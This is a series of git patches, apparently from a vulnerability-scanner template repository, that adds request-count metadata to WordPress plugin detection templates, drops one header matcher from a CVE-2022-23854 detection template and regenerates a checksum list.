a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index d4ac0d179e..87721a245a 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index dbbadf3cfc..45e0dead0e 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 48ffb25245..aa1898c4ba 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: + max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index a7ccde0b49..ba214fd7ea 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: + max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 422664a98c..8f5fe8d9a5 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: + max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index f0af3a748a..0458b13354 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: + max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index f89f1a20b3..d570be07bf 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: + max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 56dfdf4a59..fba45020e4 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: + max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 14c8f415d55161e137674ecf274fa6e2f8098c1e Mon Sep 17 00:00:00 2001 From: pphua <1739886878@qq.com> Date: Tue, 12 Sep 2023 14:01:48 +0800 Subject: [PATCH 0294/1090] Update CVE-2022-23854.yaml Due to version differences, sometimes there is no "EricomSecureGateway" in the http response. --- http/cves/2022/CVE-2022-23854.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/http/cves/2022/CVE-2022-23854.yaml b/http/cves/2022/CVE-2022-23854.yaml index 9e726dec67..d1b99a36ce 100644 --- a/http/cves/2022/CVE-2022-23854.yaml +++ b/http/cves/2022/CVE-2022-23854.yaml @@ -43,11 +43,6 @@ http: - 'extensions' condition: and - - type: word - part: header - words: - - EricomSecureGateway - - type: status status: - 200 From ab34ae4d93ad7f73722e81314d11840c1688860b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 12 Sep 2023 06:12:33 +0000 Subject: [PATCH 0296/1090] Auto Generated Templates Checksum [Tue Sep 12 06:12:33 UTC 2023] :robot: --- templates-checksum.txt | 406 ++++++++++++++++++++--------------------- 1 file changed, 203 insertions(+), 203 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 97c97db537..388164aaf3 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3740,7 +3740,7 @@ http/exposures/apis/wadl-api.yaml:2a68bb9d0c83056fa661184364eaa3bb1676a9a0 http/exposures/apis/wsdl-api.yaml:e96680c1602e3dfd78c066656580dbfa9c40ca79 http/exposures/backups/exposed-mysql-initial.yaml:acdc85b233eec58e2c294cb952e83d2c0b818631 http/exposures/backups/froxlor-database-backup.yaml:0fb55f6f7b2bd1da99d93ee3302e3c14f8f80a88 -http/exposures/backups/php-backup-files.yaml:6cb103c5d1b0411ea1d4dfe7ab76ea9bb091ebb4 +http/exposures/backups/php-backup-files.yaml:3cc0251e1aa89e75922f303ff6694539e79692ff http/exposures/backups/settings-php-files.yaml:3771e96806d801cffb1487210005d2d5087c78ca http/exposures/backups/sql-dump.yaml:f8b9dca037c8252e09216225933cfd7fb9a73569 http/exposures/backups/zip-backup-files.yaml:c19e1cc358346719f1a0f3a661a43f61e5628201 @@ -3909,7 +3909,7 @@ http/exposures/files/desktop-ini-exposure.yaml:bd4a7906c29f30db2af50eeafcff90e48 http/exposures/files/django-secret-key.yaml:7ff17ec8bf40acb56e1c2aba730704b0b5e09abd http/exposures/files/docker-cloud.yaml:620e2b3d470a0bd13e02718bc3568020b299da52 http/exposures/files/domcfg-page.yaml:df21e11c5d8871c6775284236b63b1def74bd167 -http/exposures/files/drupal-install.yaml:bbd7034c8eae972d68c49c229b0cf752f9a85fb0 +http/exposures/files/drupal-install.yaml:db4235337176678002915043f2eae169bc3f8267 http/exposures/files/ds-store-file.yaml:95cbe8cc82526fa0af82b04b79d1e0dd62f1f0e7 http/exposures/files/dwsync-exposure.yaml:0d5079c93602e8f93ebb56a0a847ea263cb590c8 http/exposures/files/environment-rb.yaml:333ae687e26c3a64b96dee8d97faeb7215e1ca4a @@ -5814,218 +5814,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd +http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 